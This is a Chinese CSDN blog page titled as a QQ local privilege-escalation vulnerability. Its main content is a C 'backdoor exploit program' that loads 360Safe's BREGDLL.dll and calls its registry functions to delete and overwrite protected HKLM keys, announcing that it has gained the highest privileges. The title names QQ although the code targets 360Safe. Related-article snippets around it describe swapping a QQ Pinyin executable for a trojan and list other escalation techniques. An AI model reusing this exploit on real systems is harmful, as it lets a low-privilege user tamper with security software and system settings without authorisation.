QQ本地提权漏洞

最新推荐文章于 2023-07-07 18:00:00 发布
最新推荐文章于 2023-07-07 18:00:00 发布
阅读量507 收藏 1
点赞数 1
文章标签: qq winapi null delete path byte
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xixuegui2010/article/details/6500193
版权

后门利用程序

  #include

  typedef BOOL (WINAPI *INIT_REG_ENGINE)();

  typedef LONG (WINAPI *BREG_DELETE_KEY)(HKEY hKey, LPCSTR lpSubKey);

  typedef LONG (WINAPI *BREG_OPEN_KEY)(HKEY hKey, LPCSTR lpSubKey, PHKEY phkResult);

  typedef LONG (WINAPI *BREG_CLOSE_KEY)(HKEY hKey);

  typedef LONG (WINAPI *REG_SET_VALUE_EX)(HKEY hKey, LPCSTR lpValueName, DWORD Reserved, DWORD dwType, const BYTE* lpData, DWORD cbData);

  BREG_DELETE_KEY BRegDeleteKey = NULL;

  BREG_OPEN_KEY BRegOpenKey = NULL;

  BREG_CLOSE_KEY BRegCloseKey = NULL;

  REG_SET_VALUE_EX BRegSetValueEx = NULL;

  #define AppPath "Software//Microsoft//Windows//CurrentVersion//App Paths//360safe.exe"

  #define TestDeleteKey HKEY_LOCAL_MACHINE

  #define TestDeleteRegPath "Software//360Safe//Update"

  #define TestSetKey HKEY_LOCAL_MACHINE

  #define TestSetPath "Software//360Safe"

  BOOL InitBRegDll()

  {

  LONG lResult;

  HKEY hKey;

  CHAR cPath[MAX_PATH + 32] = { 0 };

  DWORD dwPathLen = MAX_PATH;

  lResult = RegOpenKeyA(HKEY_LOCAL_MACHINE, AppPath, &hKey);

  if (FAILED(lResult))

  return FALSE;

  DWORD dwType = REG_SZ;

  lResult = RegQueryValueExA(hKey, "Path", NULL, &dwType, (LPBYTE)cPath, &dwPathLen);

  RegCloseKey(hKey);

  if (FAILED(lResult))

  return FALSE;

  strcat(cPath, "//deepscan//BREGDLL.dll");

  HMODULE modBReg = LoadLibraryA(cPath);

  if (!modBReg)

  return FALSE;

  INIT_REG_ENGINE InitRegEngine = (INIT_REG_ENGINE)GetProcAddress(modBReg, "InitRegEngine");

  BRegDeleteKey = (BREG_DELETE_KEY)GetProcAddress(modBReg, "BRegDeleteKey");

  BRegOpenKey = (BREG_OPEN_KEY)GetProcAddress(modBReg, "BRegOpenKey");

  BRegCloseKey = (BREG_CLOSE_KEY)GetProcAddress(modBReg, "BRegCloseKey");

  BRegSetValueEx = (REG_SET_VALUE_EX)GetProcAddress(modBReg, "BRegSetValueEx");

  if (!InitRegEngine || !BRegDeleteKey || !BRegOpenKey || !BRegCloseKey || !BRegSetValueEx) {

  FreeLibrary(modBReg);

  return FALSE;

  }

  if (!InitRegEngine()) {

  FreeLibrary(modBReg);

  return FALSE;

  }

  return TRUE;

  }

  LONG TestSetRegKey()

  {

  HKEY hKey;

  LONG lResult;

  lResult = BRegOpenKey(TestSetKey, TestSetPath, &hKey);

  if (FAILED(lResult))

  return lResult;

  DWORD dwType = REG_SZ;

  static char szData[] = "TEST VALUE";

  lResult = BRegSetValueEx(hKey, TestSetPath, NULL, dwType, (const BYTE *)&szData, (DWORD)sizeof(szData));

  BRegCloseKey(hKey);

  return lResult;

  }

  int main(int argc, char *argv[])

  {

  if (!InitBRegDll()) {

  MessageBoxA(NULL, "初始化BReg失败!", "失败", MB_ICONSTOP);

  return 1;

  }

  if (FAILED(BRegDeleteKey(TestDeleteKey, TestDeleteRegPath))) {

  MessageBoxA(NULL, "键值删除失败!", "失败", MB_ICONSTOP);

  return 2;

  }

  if (FAILED(TestSetRegKey())) {

  MessageBoxA(NULL, "设置键值失败!", "失败", MB_ICONSTOP);

  return 3;

  }

  MessageBoxA(NULL, "突破系统安全检查,获得最高权限,漏洞利用成功!", "成功", MB_OK);

  return 0;

  }
 

xixuegui2010
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
qq空间提权权限
12-11
qq空间提权权限
[原创]WIN8系统的远程桌面漏洞 利用QQ拼音纯净版实现提权
weixin_30826095的博客
11-20 139
前言 发现这个漏洞的时候,笔者正在机房上课。正想用3389远程桌面去控制宿舍电脑的时候,因为重做系统忘记自己的IP地址,因此就随手扫描了一下IP段开3389端口的电脑。 没想到就随手扫描到一台WIN8的系统,而且这个系统还装了QQ输入法WIN8纯净版。 当时我就想起初中时候的那个极品五笔的漏洞,就随手测试了一下,没想到在时隔7、8年后的今天,号称非常安全的WIN8系统居然还...
渗透测试---本地提权
孤的博客
08-16 479
本地提权 目前系统都是多用户操作系统,可以登录多个账户,实现权限的隔离,针对不同的应用,对应不同的账户,不同的账户在对应不同的权限; 本地提权一般用于已经获取到了本地低权限的账号,希望获取更高的权限,实现对目标的进一步控制; 简单地说,本地提权漏洞就是说一个本来非常低权限、受限制的用户,可以提升到系统至高无上的权限,权限控制是WINDOWS、Linux等系统安全的基石,也是一切安全软件的基石,一旦...
qq拼音提权
qq_44881113的博客
07-20 304
1 替换qq拼音里面的 QQPYUserCenter.exe 2 替换成自己的马 然后它自己就上线了
提权
qq_43776408的博客
09-29 372
提权就是提升自己在服务器中的权限 ////////////////////////// windows中通过提权使自己获得了管理员Administrator的权限 Linux中通过提权获得了root权限 //////////////////////////// 本地提权就是:本来一个权限很低的用户通过某种条件提升到最高权限 远程提权就是黑客利用远程服务器上的漏洞入侵,从而获得权限 ///...
麒麟Linux kernel本地权限提升漏洞(CVE-2022-0847)漏洞补丁及相关依赖包1
03-15
Linux kernel本地权限提升漏洞(CVE-2022-0847)漏洞补丁及相关依赖包1Linux kernel本地权限提升漏洞(CVE-2022-0847)漏洞补丁及相关依赖包1Linux kernel本地权限提升漏洞(CVE-2022-0847)漏洞补丁及相关依赖包1Linux ...
本地修改QQ群群公告
08-20
本地修改QQ群群公告系统结构:搜索QQ号,搜索QQ群,获取群公告,更改群公告,搜索QQ号,搜索QQ群,获取群公告,更改群公告,======窗口程序集1||||------__启动窗口_创建完毕||||------搜索QQ号||||-----
【网络安全必备知识】本地提权漏洞分析
zxcvbnmasdflzl的博客
03-30 267
【网络安全必备知识】本地提权漏洞分析
QQ&TIM提权漏洞分析
INSBUG的博客
07-07 1194
漏洞由于QQProtect.exe与QQProtectEngine.dll未进行进程间通信的指针校验,导致了"Write-What-Where"(WWW,“Write”表示写入的行为。所以我们应该首先更改dword_41A740的值,随后将回调函数的地址修改,也就是修改dword_1012662C的值,最后我们就能通过ROP(Return-Oriented Programming,是一种利用程序中已存在的代码片段"gadgets"来构造恶意代码执行路径的技术)实现攻击。启动SYSTEM权限的shell。
linux普通用户提权
qq_37532151的博客
08-16 9806
本文转自:https://blog.csdn.net/wanghaihao_1/article/details/80013440 鉴于本人小小虫师一枚,因业务需要,要在服务器上跑爬虫,然而我家万恶的java后台只给了我个普通权限,python中好多需要import的库并不能成功pip install,所以一时兴起,百度了一下怎么在linux下给普通用户提权。备注:我家服务器/etc/su...
二、漏洞编号为CVE-2019-7304的本地提权(略微详细)(Ubuntu16.04.4)
qwsn
10-13 3494
CVE-2019-7304漏洞的本地提权 一、漏洞分析 1.CVE-2019-7304是什么漏洞? 答:用户任何普通用户本地提权漏洞。 2.该漏洞实际上做了什么? 答:实际是在/etc/passwd中加入了一个用户,不过可以使用sudo命令,行使管理员root的权限。 3.CVE-2019-7304利用的是? 答:linux的Ubuntu服务器安装时,默认安装的“snap”服务的错误,具体是...
网络安全学习篇52_第四阶段_提权、MSF
xiaosi的博客
09-02 291
上一篇博客: 目录 提权 水平权限提升 垂直权限提升 Windows下的 启动项提权 第三方软件提权 基于WebShell的提权 IIS 的 aspx大马 asp 脚本权限比较低,尝试上传aspx的大马 数据库提权 利用MySQL执行cmd命令,udf,mof 反弹Shell WIndows下 Linux下 MSF 开始 一、提权 权限提升 水平提权 普通用户获取其他普通用户的功能权限 垂直提权 普通用户获得管理员用户的功能权限 1.1 Window
QQ空间权限限制破解思路
热门推荐
闲人的专栏
11-25 7万+
QQ空间是腾讯公司很有活力的产品,用户jg
【Windows提权】进程注入提权
ssrf
03-04 1391
介绍 获取当前操作系统进程中所拥有的权限 注入进程提权【相当于开了一个后门,隐蔽性极高,不会创建新的进程,很难发现】 注入到system用户的进程,当管理员账户或其他账户注销后,后门仍然存在。可以理解为将pinjector注入到其他用户的进程里一起运行,进而同时拥有了对应的权限。 攻击过程 使用工具列出当前操作系统的所有进程 pinjector.exe -l 可以看到不同的进程对应不同PID和用户。 执行pinjector.exe -p 600 cmd 2345注入进程pid为600的进程,使用端口23
管理员提权之上(二)
qinqin772的博客
08-10 2840
如前文所述,提权后的管理员还是不尽拥有一些Privilege,前文留下了2个问题,第一个如 "如何将提权后的某些DIsabled 状态的Privilege改为abled呢?"先不在本文给予答复, 第二个问题:"怎么添加那些没有的,即无中生有呢?",这就是本文的任务呢...且慢,我还要抛出一个问题: 就算我拿到了那些  "失落的"Privilege有能有什么用呢? 比如说SE_TCB_NAME,
基于OpenGL的C语言的魔方项目.zip
最新发布
06-15
C语言是一种广泛使用的编程语言,它具有高效、灵活、可移植性强等特点,被广泛应用于操作系统、嵌入式系统、数据库、编译器等领域的开发。C语言的基本语法包括变量、数据类型、运算符、控制结构(如if语句、循环语句等)、函数、指针等。在编写C程序时,需要注意变量的声明和定义、指针的使用、内存的分配与释放等问题。C语言中常用的数据结构包括: 1. 数组:一种存储同类型数据的结构,可以进行索引访问和修改。 2. 链表:一种存储不同类型数据的结构,每个节点包含数据和指向下一个节点的指针。 3. 栈:一种后进先出(LIFO)的数据结构,可以通过压入(push)和弹出(pop)操作进行数据的存储和取出。 4. 队列:一种先进先出(FIFO)的数据结构,可以通过入队(enqueue)和出队(dequeue)操作进行数据的存储和取出。 5. 树:一种存储具有父子关系的数据结构,可以通过中序遍历、前序遍历和后序遍历等方式进行数据的访问和修改。 6. 图:一种存储具有节点和边关系的数据结构,可以通过广度优先搜索、深度优先搜索等方式进行数据的访问和修改。 这些数据结构在C语言中都有相应的实现方式,可以应用于各种不同的场景。C语言中的各种数据结构都有其优缺点,下面列举一些常见的数据结构的优缺点: 数组: 优点:访问和修改元素的速度非常快,适用于需要频繁读取和修改数据的场合。 缺点:数组的长度是固定的,不适合存储大小不固定的动态数据,另外数组在内存中是连续分配的,当数组较大时可能会导致内存碎片化。 链表: 优点:可以方便地插入和删除元素,适用于需要频繁插入和删除数据的场合。 缺点:访问和修改元素的速度相对较慢,因为需要遍历链表找到指定的节点。 栈: 优点:后进先出(LIFO)的特性使得栈在处理递归和括号匹配等问题时非常方便。 缺点:栈的空间有限,当数据量较大时可能会导致栈溢出。 队列: 优点:先进先出(FIFO)的特性使得
linux sudo提权漏洞,linux CVE-2019-14287 Sudo提权漏洞(示例代码)
05-19
CVE-2019-14287是一个sudo提权漏洞,攻击者可以利用此漏洞绕过sudo的限制,以root用户的身份执行命令。这个漏洞影响sudo 1.8.28版本之前的所有版本。下面是一个示例代码: ``` $ sudo -u#-1 id uid=0(root) gid=0...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值